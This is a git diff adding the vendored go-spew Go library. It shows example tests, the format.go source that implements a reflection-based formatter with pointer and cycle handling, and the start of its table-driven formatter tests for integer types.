+ s1 := Foo{bar, map[interface{}]interface{}{"one": true}}
+ f := Flag(5)
+ b := []byte{
+ 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18,
+ 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20,
+ 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28,
+ 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30,
+ 0x31, 0x32,
+ }
+
+ // Dump!
+ spew.Dump(s1, f, b)
+
+ // Output:
+ // (spew_test.Foo) {
+ // unexportedField: (spew_test.Bar) {
+ // data: (uintptr) <nil>
+ // },
+ // ExportedField: (map[interface {}]interface {}) (len=1) {
+ // (string) (len=3) "one": (bool) true
+ // }
+ // }
+ // (spew_test.Flag) Unknown flag (5)
+ // ([]uint8) (len=34 cap=34) {
+ // 00000000 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 |............... |
+ // 00000010 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 |!"#$%&'()*+,-./0|
+ // 00000020 31 32 |12|
+ // }
+ //
+}
+
+// This example demonstrates how to use Printf to display a variable with a
+// format string and inline formatting.
+func ExamplePrintf() {
+ // Create a double pointer to a uint8.
+ ui8 := uint8(5)
+ pui8 := &ui8
+ ppui8 := &pui8
+
+ // Create a circular data type.
+ type circular struct {
+ ui8 uint8
+ c *circular
+ }
+ c := circular{ui8: 1}
+ c.c = &c
+
+ // Print!
+ spew.Printf("ppui8: %v\n", ppui8)
+ spew.Printf("circular: %v\n", c)
+
+ // Output:
+ // ppui8: <**>5
+ // circular: {1 <*>{1 <*><shown>}}
+}
+
+// This example demonstrates how to use a ConfigState.
+func ExampleConfigState() {
+ // Modify the indent level of the ConfigState only. The global
+ // configuration is not modified.
+ scs := spew.ConfigState{Indent: "\t"}
+
+ // Output using the ConfigState instance.
+ v := map[string]int{"one": 1}
+ scs.Printf("v: %v\n", v)
+ scs.Dump(v)
+
+ // Output:
+ // v: map[one:1]
+ // (map[string]int) (len=1) {
+ // (string) (len=3) "one": (int) 1
+ // }
+}
+
+// This example demonstrates how to use ConfigState.Dump to dump variables to
+// stdout.
+func ExampleConfigState_Dump() {
+ // See the top-level Dump example for details on the types used in this
+ // example.
+
+ // Create two ConfigState instances with different indentation.
+ scs := spew.ConfigState{Indent: "\t"}
+ scs2 := spew.ConfigState{Indent: " "}
+
+ // Set up some sample data structures for the example.
+ bar := Bar{uintptr(0)}
+ s1 := Foo{bar, map[interface{}]interface{}{"one": true}}
+
+ // Dump using the ConfigState instances.
+ scs.Dump(s1)
+ scs2.Dump(s1)
+
+ // Output:
+ // (spew_test.Foo) {
+ // unexportedField: (spew_test.Bar) {
+ // data: (uintptr) <nil>
+ // },
+ // ExportedField: (map[interface {}]interface {}) (len=1) {
+ // (string) (len=3) "one": (bool) true
+ // }
+ // }
+ // (spew_test.Foo) {
+ // unexportedField: (spew_test.Bar) {
+ // data: (uintptr) <nil>
+ // },
+ // ExportedField: (map[interface {}]interface {}) (len=1) {
+ // (string) (len=3) "one": (bool) true
+ // }
+ // }
+ //
+}
+
+// This example demonstrates how to use ConfigState.Printf to display a variable
+// with a format string and inline formatting.
+func ExampleConfigState_Printf() {
+ // See the top-level Dump example for details on the types used in this
+ // example.
+
+ // Create two ConfigState instances and modify the method handling of the
+ // first ConfigState only.
+ scs := spew.NewDefaultConfig()
+ scs2 := spew.NewDefaultConfig()
+ scs.DisableMethods = true
+
+ // Alternatively
+ // scs := spew.ConfigState{Indent: " ", DisableMethods: true}
+ // scs2 := spew.ConfigState{Indent: " "}
+
+ // This is of type Flag which implements a Stringer and has raw value 1.
+ f := flagTwo
+
+ // Dump using the ConfigState instances.
+ scs.Printf("f: %v\n", f)
+ scs2.Printf("f: %v\n", f)
+
+ // Output:
+ // f: 1
+ // f: flagTwo
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/format.go b/vendor/github.com/davecgh/go-spew/spew/format.go
new file mode 100644
index 0000000000..c49875bacb
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/format.go
@@ -0,0 +1,419 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+package spew
+
+import (
+ "bytes"
+ "fmt"
+ "reflect"
+ "strconv"
+ "strings"
+)
+
+// supportedFlags is a list of all the character flags supported by the fmt
+// package.
+const supportedFlags = "0-+# "
+
+// formatState implements the fmt.Formatter interface and contains information
+// about the state of a formatting operation. The NewFormatter function can
+// be used to get a new Formatter which can be passed directly as an argument
+// to standard fmt package printing calls.
+type formatState struct {
+ value interface{}
+ fs fmt.State
+ depth int
+ pointers map[uintptr]int
+ ignoreNextType bool
+ cs *ConfigState
+}
+
+// buildDefaultFormat recreates the original format string without precision
+// and width information to pass to fmt.Sprintf in the case of an
+// unrecognized type. Unless new types are added to the language, this
+// function won't ever be called.
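+// For example (an illustrative case), if only the '+' flag is set on the
+// state, the rebuilt format string is "%+v".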
+func (f *formatState) buildDefaultFormat() (format string) {
+ buf := bytes.NewBuffer(percentBytes)
+
+ for _, flag := range supportedFlags {
+ if f.fs.Flag(int(flag)) {
+ buf.WriteRune(flag)
+ }
+ }
+
+ buf.WriteRune('v')
+
+ format = buf.String()
+ return format
+}
+
+// constructOrigFormat recreates the original format string including precision
+// and width information to pass along to the standard fmt package. This allows
+// automatic deferral of all format strings this package doesn't support.
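+// For example (an illustrative case), a call made with width 7, precision 2,
+// and verb 'f' is rebuilt as "%7.2f".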
+func (f *formatState) constructOrigFormat(verb rune) (format string) {
+ buf := bytes.NewBuffer(percentBytes)
+
+ for _, flag := range supportedFlags {
+ if f.fs.Flag(int(flag)) {
+ buf.WriteRune(flag)
+ }
+ }
+
+ if width, ok := f.fs.Width(); ok {
+ buf.WriteString(strconv.Itoa(width))
+ }
+
+ if precision, ok := f.fs.Precision(); ok {
+ buf.Write(precisionBytes)
+ buf.WriteString(strconv.Itoa(precision))
+ }
+
+ buf.WriteRune(verb)
+
+ format = buf.String()
+ return format
+}
+
+// unpackValue returns values inside of non-nil interfaces when possible and
+// ensures that types for values which have been unpacked from an interface
+// are displayed when the show types flag is also set.
+// This is useful for data types like structs, arrays, slices, and maps which
+// can contain varying types packed inside an interface.
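+// For example, an interface{} holding an int is unwrapped so the concrete int
+// (and its type, when types are being shown) is what gets formatted.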
+func (f *formatState) unpackValue(v reflect.Value) reflect.Value {
+ if v.Kind() == reflect.Interface {
+ f.ignoreNextType = false
+ if !v.IsNil() {
+ v = v.Elem()
+ }
+ }
+ return v
+}
+
+// formatPtr handles formatting of pointers by indirecting them as necessary.
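+// It also tracks previously seen pointers to detect circular references and,
+// when the '+' flag is set, records the chain of dereferenced addresses so
+// they can be displayed.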
+func (f *formatState) formatPtr(v reflect.Value) {
+ // Display nil if the top-level pointer is nil.
+ showTypes := f.fs.Flag('#')
+ if v.IsNil() && (!showTypes || f.ignoreNextType) {
+ f.fs.Write(nilAngleBytes)
+ return
+ }
+
+ // Remove pointers at or below the current depth from the map used to detect
+ // circular refs.
+ for k, depth := range f.pointers {
+ if depth >= f.depth {
+ delete(f.pointers, k)
+ }
+ }
+
+ // Keep list of all dereferenced pointers to possibly show later.
+ pointerChain := make([]uintptr, 0)
+
+ // Figure out how many levels of indirection there are by dereferencing
+ // pointers and unpacking interfaces down the chain while detecting circular
+ // references.
+ nilFound := false
+ cycleFound := false
+ indirects := 0
+ ve := v
+ for ve.Kind() == reflect.Ptr {
+ if ve.IsNil() {
+ nilFound = true
+ break
+ }
+ indirects++
+ addr := ve.Pointer()
+ pointerChain = append(pointerChain, addr)
+ if pd, ok := f.pointers[addr]; ok && pd < f.depth {
+ cycleFound = true
+ indirects--
+ break
+ }
+ f.pointers[addr] = f.depth
+
+ ve = ve.Elem()
+ if ve.Kind() == reflect.Interface {
+ if ve.IsNil() {
+ nilFound = true
+ break
+ }
+ ve = ve.Elem()
+ }
+ }
+
+ // Display type or indirection level depending on flags.
+ if showTypes && !f.ignoreNextType {
+ f.fs.Write(openParenBytes)
+ f.fs.Write(bytes.Repeat(asteriskBytes, indirects))
+ f.fs.Write([]byte(ve.Type().String()))
+ f.fs.Write(closeParenBytes)
+ } else {
+ if nilFound || cycleFound {
+ indirects += strings.Count(ve.Type().String(), "*")
+ }
+ f.fs.Write(openAngleBytes)
+ f.fs.Write([]byte(strings.Repeat("*", indirects)))
+ f.fs.Write(closeAngleBytes)
+ }
+
+ // Display pointer information depending on flags.
+ if f.fs.Flag('+') && (len(pointerChain) > 0) {
+ f.fs.Write(openParenBytes)
+ for i, addr := range pointerChain {
+ if i > 0 {
+ f.fs.Write(pointerChainBytes)
+ }
+ printHexPtr(f.fs, addr)
+ }
+ f.fs.Write(closeParenBytes)
+ }
+
+ // Display dereferenced value.
+ switch {
+ case nilFound:
+ f.fs.Write(nilAngleBytes)
+
+ case cycleFound:
+ f.fs.Write(circularShortBytes)
+
+ default:
+ f.ignoreNextType = true
+ f.format(ve)
+ }
+}
+
+// format is the main workhorse for providing the Formatter interface. It
+// uses the passed reflect value to figure out what kind of object we are
+// dealing with and formats it appropriately. It is a recursive function,
+// however circular data structures are detected and handled properly.
+func (f *formatState) format(v reflect.Value) {
+ // Handle invalid reflect values immediately.
+ kind := v.Kind()
+ if kind == reflect.Invalid {
+ f.fs.Write(invalidAngleBytes)
+ return
+ }
+
+ // Handle pointers specially.
+ if kind == reflect.Ptr {
+ f.formatPtr(v)
+ return
+ }
+
+ // Print type information unless already handled elsewhere.
+ if !f.ignoreNextType && f.fs.Flag('#') {
+ f.fs.Write(openParenBytes)
+ f.fs.Write([]byte(v.Type().String()))
+ f.fs.Write(closeParenBytes)
+ }
+ f.ignoreNextType = false
+
+ // Call Stringer/error interfaces if they exist and the handle methods
+ // flag is enabled.
+ if !f.cs.DisableMethods {
+ if (kind != reflect.Invalid) && (kind != reflect.Interface) {
+ if handled := handleMethods(f.cs, f.fs, v); handled {
+ return
+ }
+ }
+ }
+
+ switch kind {
+ case reflect.Invalid:
+ // Do nothing. We should never get here since invalid has already
+ // been handled above.
+
+ case reflect.Bool:
+ printBool(f.fs, v.Bool())
+
+ case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int:
+ printInt(f.fs, v.Int(), 10)
+
+ case reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uint:
+ printUint(f.fs, v.Uint(), 10)
+
+ case reflect.Float32:
+ printFloat(f.fs, v.Float(), 32)
+
+ case reflect.Float64:
+ printFloat(f.fs, v.Float(), 64)
+
+ case reflect.Complex64:
+ printComplex(f.fs, v.Complex(), 32)
+
+ case reflect.Complex128:
+ printComplex(f.fs, v.Complex(), 64)
+
+ case reflect.Slice:
+ if v.IsNil() {
+ f.fs.Write(nilAngleBytes)
+ break
+ }
+ fallthrough
+
+ case reflect.Array:
+ f.fs.Write(openBracketBytes)
+ f.depth++
+ if (f.cs.MaxDepth != 0) && (f.depth > f.cs.MaxDepth) {
+ f.fs.Write(maxShortBytes)
+ } else {
+ numEntries := v.Len()
+ for i := 0; i < numEntries; i++ {
+ if i > 0 {
+ f.fs.Write(spaceBytes)
+ }
+ f.ignoreNextType = true
+ f.format(f.unpackValue(v.Index(i)))
+ }
+ }
+ f.depth--
+ f.fs.Write(closeBracketBytes)
+
+ case reflect.String:
+ f.fs.Write([]byte(v.String()))
+
+ case reflect.Interface:
+ // The only time we should get here is for nil interfaces due to
+ // unpackValue calls.
+ if v.IsNil() {
+ f.fs.Write(nilAngleBytes)
+ }
+
+ case reflect.Ptr:
+ // Do nothing. We should never get here since pointers have already
+ // been handled above.
+
+ case reflect.Map:
+ // Nil maps should be indicated as different from empty maps.
+ if v.IsNil() {
+ f.fs.Write(nilAngleBytes)
+ break
+ }
+
+ f.fs.Write(openMapBytes)
+ f.depth++
+ if (f.cs.MaxDepth != 0) && (f.depth > f.cs.MaxDepth) {
+ f.fs.Write(maxShortBytes)
+ } else {
+ keys := v.MapKeys()
+ if f.cs.SortKeys {
+ sortValues(keys, f.cs)
+ }
+ for i, key := range keys {
+ if i > 0 {
+ f.fs.Write(spaceBytes)
+ }
+ f.ignoreNextType = true
+ f.format(f.unpackValue(key))
+ f.fs.Write(colonBytes)
+ f.ignoreNextType = true
+ f.format(f.unpackValue(v.MapIndex(key)))
+ }
+ }
+ f.depth--
+ f.fs.Write(closeMapBytes)
+
+ case reflect.Struct:
+ numFields := v.NumField()
+ f.fs.Write(openBraceBytes)
+ f.depth++
+ if (f.cs.MaxDepth != 0) && (f.depth > f.cs.MaxDepth) {
+ f.fs.Write(maxShortBytes)
+ } else {
+ vt := v.Type()
+ for i := 0; i < numFields; i++ {
+ if i > 0 {
+ f.fs.Write(spaceBytes)
+ }
+ vtf := vt.Field(i)
+ if f.fs.Flag('+') || f.fs.Flag('#') {
+ f.fs.Write([]byte(vtf.Name))
+ f.fs.Write(colonBytes)
+ }
+ f.format(f.unpackValue(v.Field(i)))
+ }
+ }
+ f.depth--
+ f.fs.Write(closeBraceBytes)
+
+ case reflect.Uintptr:
+ printHexPtr(f.fs, uintptr(v.Uint()))
+
+ case reflect.UnsafePointer, reflect.Chan, reflect.Func:
+ printHexPtr(f.fs, v.Pointer())
+
+ // There were no other types at the time this code was written, but fall
+ // back to letting the default fmt package handle it if any get added.
+ default:
+ format := f.buildDefaultFormat()
+ if v.CanInterface() {
+ fmt.Fprintf(f.fs, format, v.Interface())
+ } else {
+ fmt.Fprintf(f.fs, format, v.String())
+ }
+ }
+}
+
+// Format satisfies the fmt.Formatter interface. See NewFormatter for usage
+// details.
+func (f *formatState) Format(fs fmt.State, verb rune) {
+ f.fs = fs
+
+ // Use standard formatting for verbs that are not v.
+ if verb != 'v' {
+ format := f.constructOrigFormat(verb)
+ fmt.Fprintf(fs, format, f.value)
+ return
+ }
+
+ if f.value == nil {
+ if fs.Flag('#') {
+ fs.Write(interfaceBytes)
+ }
+ fs.Write(nilAngleBytes)
+ return
+ }
+
+ f.format(reflect.ValueOf(f.value))
+}
+
+// newFormatter is a helper function to consolidate the logic from the various
+// public methods which take varying config states.
+func newFormatter(cs *ConfigState, v interface{}) fmt.Formatter {
+ fs := &formatState{value: v, cs: cs}
+ fs.pointers = make(map[uintptr]int)
+ return fs
+}
+
+/*
+NewFormatter returns a custom formatter that satisfies the fmt.Formatter
+interface. As a result, it integrates cleanly with standard fmt package
+printing functions. The formatter is useful for inline printing of smaller data
+types similar to the standard %v format specifier.
+
+The custom formatter only responds to the %v (most compact), %+v (adds pointer
+addresses), %#v (adds types), or %#+v (adds types and pointer addresses) verb
+combinations. Any other verbs such as %x and %q will be sent to the
+standard fmt package for formatting. In addition, the custom formatter ignores
+the width and precision arguments (however they will still work on the format
+specifiers not handled by the custom formatter).
+
+Typically this function shouldn't be called directly. It is much easier to make
+use of the custom formatter by calling one of the convenience functions such as
+Printf, Println, or Fprintf.
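+
+For example, the following two calls are equivalent (an illustrative sketch):
+
+ fmt.Printf("%v\n", spew.NewFormatter(v))
+ spew.Printf("%v\n", v)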
+*/
+func NewFormatter(v interface{}) fmt.Formatter {
+ return newFormatter(&Config, v)
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/format_test.go b/vendor/github.com/davecgh/go-spew/spew/format_test.go
new file mode 100644
index 0000000000..f9b93abe86
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/format_test.go
@@ -0,0 +1,1558 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+/*
+Test Summary:
+NOTE: For each test, a nil pointer, a single pointer, and a double pointer to
+the base test element are also tested to ensure proper indirection across all
+types.
+
+- Max int8, int16, int32, int64, int
+- Max uint8, uint16, uint32, uint64, uint
+- Boolean true and false
+- Standard complex64 and complex128
+- Array containing standard ints
+- Array containing type with custom formatter on pointer receiver only
+- Array containing interfaces
+- Slice containing standard float32 values
+- Slice containing type with custom formatter on pointer receiver only
+- Slice containing interfaces
+- Nil slice
+- Standard string
+- Nil interface
+- Sub-interface
+- Map with string keys and int vals
+- Map with custom formatter type on pointer receiver only keys and vals
+- Map with interface keys and values
+- Map with nil interface value
+- Struct with primitives
+- Struct that contains another struct
+- Struct that contains custom type with Stringer pointer interface via both
+ exported and unexported fields
+- Struct that contains embedded struct and field to same struct
+- Uintptr to 0 (null pointer)
+- Uintptr address of real variable
+- Unsafe.Pointer to 0 (null pointer)
+- Unsafe.Pointer to address of real variable
+- Nil channel
+- Standard int channel
+- Function with no params and no returns
+- Function with param and no returns
+- Function with multiple params and multiple returns
+- Struct that is circular through self referencing
+- Structs that are circular through cross referencing
+- Structs that are indirectly circular
+- Type that panics in its Stringer interface
+- Type that has a custom Error interface
+- %x passthrough with uint
+- %#x passthrough with uint
+- %f passthrough with precision
+- %f passthrough with width and precision
+- %d passthrough with width
+- %q passthrough with string
+*/
+
+package spew_test
+
+import (
+ "bytes"
+ "fmt"
+ "testing"
+ "unsafe"
+
+ "github.com/davecgh/go-spew/spew"
+)
+
+// formatterTest is used to describe a test to be performed against NewFormatter.
+type formatterTest struct {
+ format string
+ in interface{}
+ wants []string
+}
+
+// formatterTests houses all of the tests to be performed against NewFormatter.
+var formatterTests = make([]formatterTest, 0)
+
+// addFormatterTest is a helper method to append the passed input and desired
+// result to formatterTests.
+func addFormatterTest(format string, in interface{}, wants ...string) {
+ test := formatterTest{format, in, wants}
+ formatterTests = append(formatterTests, test)
+}
+
+func addIntFormatterTests() {
+ // Max int8.
+ v := int8(127)
+ nv := (*int8)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "int8"
+ vs := "127"
+ addFormatterTest("%v", v, vs)
+ addFormatterTest("%v", pv, "<*>"+vs)
+ addFormatterTest("%v", &pv, "<**>"+vs)
+ addFormatterTest("%v", nv, "")
+ addFormatterTest("%+v", v, vs)
+ addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+ addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%+v", nv, "")
+ addFormatterTest("%#v", v, "("+vt+")"+vs)
+ addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+ addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+ addFormatterTest("%#v", nv, "(*"+vt+")"+"")
+ addFormatterTest("%#+v", v, "("+vt+")"+vs)
+ addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+ addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%#+v", nv, "(*"+vt+")"+"")
+
+ // Max int16.
+ v2 := int16(32767)
+ nv2 := (*int16)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "int16"
+ v2s := "32767"
+ addFormatterTest("%v", v2, v2s)
+ addFormatterTest("%v", pv2, "<*>"+v2s)
+ addFormatterTest("%v", &pv2, "<**>"+v2s)
+ addFormatterTest("%v", nv2, "")
+ addFormatterTest("%+v", v2, v2s)
+ addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+ addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%+v", nv2, "")
+ addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+ addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+ addFormatterTest("%#v", nv2, "(*"+v2t+")"+"")
+ addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"")
+
+ // Max int32.
+ v3 := int32(2147483647)
+ nv3 := (*int32)(nil)
+ pv3 := &v3
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "int32"
+ v3s := "2147483647"
+ addFormatterTest("%v", v3, v3s)
+ addFormatterTest("%v", pv3, "<*>"+v3s)
+ addFormatterTest("%v", &pv3, "<**>"+v3s)
+ addFormatterTest("%v", nv3, "")
+ addFormatterTest("%+v", v3, v3s)
+ addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s)
+ addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s)
+ addFormatterTest("%+v", nv3, "")
+ addFormatterTest("%#v", v3, "("+v3t+")"+v3s)
+ addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s)
+ addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s)
+ addFormatterTest("%#v", nv3, "(*"+v3t+")"+"")
+ addFormatterTest("%#+v", v3, "("+v3t+")"+v3s)
+ addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s)
+ addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s)
+ addFormatterTest("%#v", nv3, "(*"+v3t+")"+"")
+
+ // Max int64.
+ v4 := int64(9223372036854775807)
+ nv4 := (*int64)(nil)
+ pv4 := &v4
+ v4Addr := fmt.Sprintf("%p", pv4)
+ pv4Addr := fmt.Sprintf("%p", &pv4)
+ v4t := "int64"
+ v4s := "9223372036854775807"
+ addFormatterTest("%v", v4, v4s)
+ addFormatterTest("%v", pv4, "<*>"+v4s)
+ addFormatterTest("%v", &pv4, "<**>"+v4s)
+ addFormatterTest("%v", nv4, "")
+ addFormatterTest("%+v", v4, v4s)
+ addFormatterTest("%+v", pv4, "<*>("+v4Addr+")"+v4s)
+ addFormatterTest("%+v", &pv4, "<**>("+pv4Addr+"->"+v4Addr+")"+v4s)
+ addFormatterTest("%+v", nv4, "")
+ addFormatterTest("%#v", v4, "("+v4t+")"+v4s)
+ addFormatterTest("%#v", pv4, "(*"+v4t+")"+v4s)
+ addFormatterTest("%#v", &pv4, "(**"+v4t+")"+v4s)
+ addFormatterTest("%#v", nv4, "(*"+v4t+")"+"")
+ addFormatterTest("%#+v", v4, "("+v4t+")"+v4s)
+ addFormatterTest("%#+v", pv4, "(*"+v4t+")("+v4Addr+")"+v4s)
+ addFormatterTest("%#+v", &pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")"+v4s)
+ addFormatterTest("%#+v", nv4, "(*"+v4t+")"+"")
+
+ // Max int.
+ v5 := int(2147483647)
+ nv5 := (*int)(nil)
+ pv5 := &v5
+ v5Addr := fmt.Sprintf("%p", pv5)
+ pv5Addr := fmt.Sprintf("%p", &pv5)
+ v5t := "int"
+ v5s := "2147483647"
+ addFormatterTest("%v", v5, v5s)
+ addFormatterTest("%v", pv5, "<*>"+v5s)
+ addFormatterTest("%v", &pv5, "<**>"+v5s)
+ addFormatterTest("%v", nv5, "")
+ addFormatterTest("%+v", v5, v5s)
+ addFormatterTest("%+v", pv5, "<*>("+v5Addr+")"+v5s)
+ addFormatterTest("%+v", &pv5, "<**>("+pv5Addr+"->"+v5Addr+")"+v5s)
+ addFormatterTest("%+v", nv5, "")
+ addFormatterTest("%#v", v5, "("+v5t+")"+v5s)
+ addFormatterTest("%#v", pv5, "(*"+v5t+")"+v5s)
+ addFormatterTest("%#v", &pv5, "(**"+v5t+")"+v5s)
+ addFormatterTest("%#v", nv5, "(*"+v5t+")"+"")
+ addFormatterTest("%#+v", v5, "("+v5t+")"+v5s)
+ addFormatterTest("%#+v", pv5, "(*"+v5t+")("+v5Addr+")"+v5s)
+ addFormatterTest("%#+v", &pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")"+v5s)
+ addFormatterTest("%#+v", nv5, "(*"+v5t+")"+"")
+}
+
+func addUintFormatterTests() {
+ // Max uint8.
+ v := uint8(255)
+ nv := (*uint8)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "uint8"
+ vs := "255"
+ addFormatterTest("%v", v, vs)
+ addFormatterTest("%v", pv, "<*>"+vs)
+ addFormatterTest("%v", &pv, "<**>"+vs)
+ addFormatterTest("%v", nv, "")
+ addFormatterTest("%+v", v, vs)
+ addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+ addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%+v", nv, "")
+ addFormatterTest("%#v", v, "("+vt+")"+vs)
+ addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+ addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+ addFormatterTest("%#v", nv, "(*"+vt+")"+"")
+ addFormatterTest("%#+v", v, "("+vt+")"+vs)
+ addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+ addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%#+v", nv, "(*"+vt+")"+"")
+
+ // Max uint16.
+ v2 := uint16(65535)
+ nv2 := (*uint16)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "uint16"
+ v2s := "65535"
+ addFormatterTest("%v", v2, v2s)
+ addFormatterTest("%v", pv2, "<*>"+v2s)
+ addFormatterTest("%v", &pv2, "<**>"+v2s)
+ addFormatterTest("%v", nv2, "")
+ addFormatterTest("%+v", v2, v2s)
+ addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+ addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%+v", nv2, "")
+ addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+ addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+ addFormatterTest("%#v", nv2, "(*"+v2t+")"+"")
+ addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"")
+
+ // Max uint32.
+ v3 := uint32(4294967295)
+ nv3 := (*uint32)(nil)
+ pv3 := &v3
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "uint32"
+ v3s := "4294967295"
+ addFormatterTest("%v", v3, v3s)
+ addFormatterTest("%v", pv3, "<*>"+v3s)
+ addFormatterTest("%v", &pv3, "<**>"+v3s)
+ addFormatterTest("%v", nv3, "")
+ addFormatterTest("%+v", v3, v3s)
+ addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s)
+ addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s)
+ addFormatterTest("%+v", nv3, "")
+ addFormatterTest("%#v", v3, "("+v3t+")"+v3s)
+ addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s)
+ addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s)
+ addFormatterTest("%#v", nv3, "(*"+v3t+")"+"")
+ addFormatterTest("%#+v", v3, "("+v3t+")"+v3s)
+ addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s)
+ addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s)
+ addFormatterTest("%#v", nv3, "(*"+v3t+")"+"")
+
+ // Max uint64.
+ v4 := uint64(18446744073709551615)
+ nv4 := (*uint64)(nil)
+ pv4 := &v4
+ v4Addr := fmt.Sprintf("%p", pv4)
